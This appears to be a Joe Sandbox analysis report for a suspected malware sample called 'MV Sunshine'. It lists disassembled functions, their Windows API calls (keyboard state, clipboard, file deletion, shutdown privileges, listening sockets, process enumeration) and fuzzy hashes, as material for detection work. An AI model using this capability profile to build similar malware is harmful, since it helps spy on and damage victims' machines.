Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 403e061dc7c655cdd2f68f4e8b8326c3025775570df6fa793576fc5171272238
Instruction ID: 73ecea21d654cfc9aa1c0133053d62583b6bc756fdf5959a9d0900b25e7dadcd
Opcode Fuzzy Hash: 403e061dc7c655cdd2f68f4e8b8326c3025775570df6fa793576fc5171272238
Instruction Fuzzy Hash: F64187349047CA6FFFB1BBA488183E5BAA26F22340F184A9DD5C5563C2D7D45ACC8792

Function 00694458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0069447F
EmptyClipboard.USER32 ref: 00694485
GlobalAlloc.KERNEL32(00000002,?), ref: 0069449A
CloseClipboard.USER32 ref: 00694539

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: ad70dc84da74f4a29cf199a1fd70bf9cc3a59e8b2c5d4cfef7fde2aff67dddb6
Instruction ID: bd19bf7dcf4b5133dcadfb41f78f1c222db4fd18338cf38df71cd63c734de0a6
Opcode Fuzzy Hash: ad70dc84da74f4a29cf199a1fd70bf9cc3a59e8b2c5d4cfef7fde2aff67dddb6
Instruction Fuzzy Hash: 192180356006209FDB10AFA0EC49F697BAAEF45711F14901AF946DB261DB30BD02CF59

Function 00683A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 006248AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006248A1,?,?,006237C0,?), ref: 006248CE

Part of subcall function 00684CD3: GetFileAttributesW.KERNEL32(?,00683947), ref: 00684CD4

FindFirstFileW.KERNEL32(?,?), ref: 00683ADF
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00683B87
MoveFileW.KERNEL32(?,?), ref: 00683B9A
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00683BB7
FindNextFileW.KERNEL32(00000000,00000010), ref: 00683BD9
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00683BF5

Strings

\*.*, xrefs: 00683A8A, 00683A93, 00683AA8

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: e181c5f62003bc8ce25011d3599777451ed94dac8cddae5a1cae65c913724330
Instruction ID: aac20ee85e261e0f61f34790dd6e40f0c762a4212fa4010177edb2b6e4cd95bf
Opcode Fuzzy Hash: e181c5f62003bc8ce25011d3599777451ed94dac8cddae5a1cae65c913724330
Instruction Fuzzy Hash: E6517D318016699ACF55FBA0D9929EDB77AAF14300F244269E44277291EF306F09CFA4

Function 00634140 Relevance: 13.4, APIs: 1, Strings: 6, Instructions: 1132COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00634520
VUUU, xrefs: 006344DB
Oac, xrefs: 00634984, 00668173
VUUU, xrefs: 00667B0C
VUUU, xrefs: 006344ED
ERCP, xrefs: 0063421F

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID:
String ID: ERCP$Oac$VUUU$VUUU$VUUU$VUUU
API String ID: 0-600082611
Opcode ID: c0026eac12160585abec7710b8de897e42de589557b5c3634ba2dd907aee1b53
Instruction ID: d7c6a79bf2d24ab72a702b93d9db77a4cc872e5e55914618e90162e0ef7d2638
Opcode Fuzzy Hash: c0026eac12160585abec7710b8de897e42de589557b5c3634ba2dd907aee1b53
Instruction Fuzzy Hash: B5A25D70E0421A8BDF24CF58C9907EDF7B2BF55314F1486AAD856A7380DB74AE85CB90

Function 0068F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00627F41: _memmove.LIBCMT ref: 00627F82

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0068F6AB
Sleep.KERNEL32(0000000A), ref: 0068F6DB
_wcscmp.LIBCMT ref: 0068F6EF
_wcscmp.LIBCMT ref: 0068F70A
FindNextFileW.KERNEL32(?,?), ref: 0068F7A8
FindClose.KERNEL32(00000000), ref: 0068F7BE

Strings

*.*, xrefs: 0068F690

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: db2056181cd549f6dceb8c960c415bafab29ce12a24b2bbda86f245a7a0a239c
Instruction ID: cb19c19b2f258876b876adf854b8049287ece437d78dd2b27357e51e3ff455e6
Opcode Fuzzy Hash: db2056181cd549f6dceb8c960c415bafab29ce12a24b2bbda86f245a7a0a239c
Instruction Fuzzy Hash: 0441917190021A9FDF50EFA4DC45AEEBBB6FF05310F14466AE815A3290EB309E44CFA4

Function 006358C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00635A05
_memmove.LIBCMT ref: 00635A55
_memmove.LIBCMT ref: 00635ABB

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: fe60bc927cffa324ae731cd7597dea9abeec296e5271a1a3418c654cfe1cd1a8
Instruction ID: ed871253ee992cd4c75dcf378d9d2ce6edf9f7dc7cd27d5ae18a2d89dac309ca
Opcode Fuzzy Hash: fe60bc927cffa324ae731cd7597dea9abeec296e5271a1a3418c654cfe1cd1a8
Instruction Fuzzy Hash: A0128E70A00A19DFDF14DFA4D985AEEB7F6FF48300F108569E406A7291EB35AD11CBA4

Function 00635680 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 00640FF6: std::exception::exception.LIBCMT ref: 0064102C
Part of subcall function 00640FF6: __CxxThrowException@8.LIBCMT ref: 00641041

_memmove.LIBCMT ref: 0067062F
_memmove.LIBCMT ref: 00670744
_memmove.LIBCMT ref: 006707EB

Strings

yZc, xrefs: 00670881, 006707FF

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID: yZc
API String ID: 1300846289-814616561
Opcode ID: 8e3c3bc4ec660a1c31ea29838d649d032cd2f65fbfbfaad18aaefa8b0500d908
Instruction ID: cdda8c0e440d41e342a030945dd7e3aab8c6c624d36d1957e84c38c2d27560b2
Opcode Fuzzy Hash: 8e3c3bc4ec660a1c31ea29838d649d032cd2f65fbfbfaad18aaefa8b0500d908
Instruction Fuzzy Hash: 4A02A0B0E00619DFDF44DF64D981AAEBBB6EF44300F148069E80ADB395EB31D951CBA5

Function 0068545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00678CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00678D0D
Part of subcall function 00678CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00678D3A
Part of subcall function 00678CC3: GetLastError.KERNEL32 ref: 00678D47

ExitWindowsEx.USER32(?,00000000), ref: 0068549B

Strings

, xrefs: 00685489
@, xrefs: 0068548E
SeShutdownPrivilege, xrefs: 0068546B

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 4fc6870d78378d751b8a03fbbd99c5ca3cef1b85fe0135353fe3a166110dddf3
Instruction ID: 45d49c4cbf4a1d01962d2ee482498e4ba6705fa52c6c82cae4d7b83100fdd681
Opcode Fuzzy Hash: 4fc6870d78378d751b8a03fbbd99c5ca3cef1b85fe0135353fe3a166110dddf3
Instruction Fuzzy Hash: D6012431A94A112AE76873B89C4ABFA729AAB01742F200335FC07E22C2DA601C848395

Function 00633190 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON

Download Yara Rule

Strings

Oac, xrefs: 00633482

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: __itow__swprintf
String ID: Oac
API String ID: 674341424-752515563
Opcode ID: 2c1246b6b6a46ab9a0179501779c1f03cb9cb76b5eb068e7e7ea30865e5c0629
Instruction ID: 3d5df8df8b223ba4d03d0046d30de0d300722fd09047d248c1538dc5999f0541
Opcode Fuzzy Hash: 2c1246b6b6a46ab9a0179501779c1f03cb9cb76b5eb068e7e7ea30865e5c0629
Instruction Fuzzy Hash: B922BC716083119FD760DF24C891BAFB7E6AF84714F00891DF88A97391DB30EA45CB96

Function 00696596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 006965EF
WSAGetLastError.WSOCK32(00000000), ref: 006965FE
bind.WSOCK32(00000000,?,00000010), ref: 0069661A
listen.WSOCK32(00000000,00000005), ref: 00696629
WSAGetLastError.WSOCK32(00000000), ref: 00696643
closesocket.WSOCK32(00000000,00000000), ref: 00696657

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 23c51119ef66ca8f6fca4ed61c28c4802b67cdda5b2cf6a46bec3145a32613a8
Instruction ID: ad0da5d92464fce17e173bdedbb9603e737422b70649ffd7c0a79cd033df9356
Opcode Fuzzy Hash: 23c51119ef66ca8f6fca4ed61c28c4802b67cdda5b2cf6a46bec3145a32613a8
Instruction Fuzzy Hash: C5219C306006109FDF10AF64D889A6EB7BAEF49720F14816DF95AE73D1CB70AD01CB66

Function 00621287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00622612: GetWindowLongW.USER32(?,000000EB), ref: 00622623

DefDlgProcW.USER32(?,?,?,?,?), ref: 006219FA
GetSysColor.USER32(0000000F), ref: 00621A4E
SetBkColor.GDI32(?,00000000), ref: 00621A61

Part of subcall function 00621290: DefDlgProcW.USER32(?,00000020,?), ref: 006212D8

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: c184b44729d9b0bdf301a314e7ce5371cd751a538556758920a082b9111a759a
Instruction ID: 7dd92563720663fef9a0b07e4e4f2ff3d056cc15be84ec3c48ea383d0e882ea3
Opcode Fuzzy Hash: c184b44729d9b0bdf301a314e7ce5371cd751a538556758920a082b9111a759a
Instruction Fuzzy Hash: 47A16A70109DA4BAD738AB28AC55EFF255FDB63392F14010DF802DD291CE129D429EBA

Function 00696A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 006980A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006980CB

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00696AB1
WSAGetLastError.WSOCK32(00000000), ref: 00696ADA
bind.WSOCK32(00000000,?,00000010), ref: 00696B13
WSAGetLastError.WSOCK32(00000000), ref: 00696B20
closesocket.WSOCK32(00000000,00000000), ref: 00696B34

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: d70d0146a00056a365824f144b26e3a8516d3ef56b231e3776103cca862785fa
Instruction ID: 5980af3c8d941c2059e17db81bf4feea3d2d9b5e737826613d07f407673b98af
Opcode Fuzzy Hash: d70d0146a00056a365824f144b26e3a8516d3ef56b231e3776103cca862785fa
Instruction Fuzzy Hash: 1E41B875B007209FEB50BF64EC86F6E77AA9B45720F04805CF95AAB3C2DA705D018B65

Function 006A55FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 006A564C
IsWindowEnabled.USER32 ref: 006A565A
GetForegroundWindow.USER32(?,?,00000001), ref: 006A5667
IsIconic.USER32 ref: 006A5675
IsZoomed.USER32 ref: 006A5683

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: be49ddaa520a370df366ab498f7d1e8e12af782e62959ab76cafeee86acf569f
Instruction ID: f6fa8269d32b169700089b781a19857d21ff23694865ad7db616ccb7231a6981
Opcode Fuzzy Hash: be49ddaa520a370df366ab498f7d1e8e12af782e62959ab76cafeee86acf569f
Instruction Fuzzy Hash: 0811C831B00A206FD721BF66DC44A6F779BEF56721B446029F447D7251CB70ED018EA5

Function 0068C602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0068C69D
CoCreateInstance.OLE32(006B2D6C,00000000,00000001,006B2BDC,?), ref: 0068C6B5

Part of subcall function 00627F41: _memmove.LIBCMT ref: 00627F82

CoUninitialize.OLE32 ref: 0068C922

Strings

.lnk, xrefs: 0068C631, 0068C659, 0068C663

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 910b211b34537b9e7b0fbabbe3285c3c3cf455a9c58952bdceaeb120cff21264
Instruction ID: 6f6b0dd40eb5e89157f376693f4e436f258a4e986420fd01a76c7b2771fe7cb6
Opcode Fuzzy Hash: 910b211b34537b9e7b0fbabbe3285c3c3cf455a9c58952bdceaeb120cff21264
Instruction Fuzzy Hash: F9A16A71108715AFD740EF54D892EABB7E9EF94304F00491CF196971A2EB70EA09CF66

Function 0069C304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00661D88,?), ref: 0069C312
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0069C324

Strings

GetSystemWow64DirectoryW, xrefs: 0069C31E
kernel32.dll, xrefs: 0069C30D

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: b153108118aeb41b2419bf1c290f027d7bf2282df3f03ec9e73eaf4b8b220707
Instruction ID: 1c1906e39962db70979077478d31aa10fdb7c396dbc5bf335e9d553c06608ada
Opcode Fuzzy Hash: b153108118aeb41b2419bf1c290f027d7bf2282df3f03ec9e73eaf4b8b220707
Instruction Fuzzy Hash: 2FE08C70600703CFDF206F65C814A8676EAEB09765B809439E895C2710E770E841CBA0

Function 0069F121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0069F151
Process32FirstW.KERNEL32(00000000,?), ref: 0069F15F

Part of subcall function 00627F41: _memmove.LIBCMT ref: 00627F82

Process32NextW.KERNEL32(00000000,?), ref: 0069F21F
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0069F22E

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: bfcb48492e25e714991913afca575629317a3c0bca600812b988cfb1264b9388
Instruction ID: 30e9fb436e4fc92022ca2be840f08a67a0c1f7adb77cae54df22344537bbe020
Opcode Fuzzy Hash: bfcb48492e25e714991913afca575629317a3c0bca600812b988cfb1264b9388
Instruction Fuzzy Hash: 89519E715047119FD750EF24EC82E6BB7EAFF88710F14482DF49697291EB70AA08CB96

Function 0067EB07 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 0067EB19

Strings

(, xrefs: 0067EB5F
|, xrefs: 0067EB49

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 7be84d31c226a25b5bfcdf04f25099c2fe467ce4d7c577fe5ab0bf50e80e2595
Instruction ID: 4604e0eb13f43f38f55815e8b77c954f3a70890e6bc18597f2271e45b89e4890
Opcode Fuzzy Hash: 7be84d31c226a25b5bfcdf04f25099c2fe467ce4d7c577fe5ab0bf50e80e2595
Instruction Fuzzy Hash: F0324775A007059FD728CF29C4819AAB7F2FF48710B15C5AEE89ADB3A1E770E941CB44

Function 006925E2 Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00691AFE,00000000), ref: 006926D5
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0069270C

Memory Dump Source

Source File: 00000000.00000002.2118274377.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2118262883.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118320923.00000000006D5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118358555.00000000006DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2118373133.00000000006E8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_MV Sunshine.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: c7f6de24c6832dc81729f86fc563d01d720bc1e08b21c3d50c4ad05967b53606
Instruction ID: ac8e10845c3bcb82bf5e0fed2558c502fe92c207577597bc9401fccb08a6f92d
Opcode Fuzzy Hash: c7f6de24c6832dc81729f86fc563d01d720bc1e08b21c3d50c4ad05967b53606
Instruction Fuzzy Hash: 8041D67550420ABFEF20DF94DC95EFBB7FEEB40714F10406EF601AAA40EA71AE419664

Function 0068B59E Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0068B5AE
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0068B608
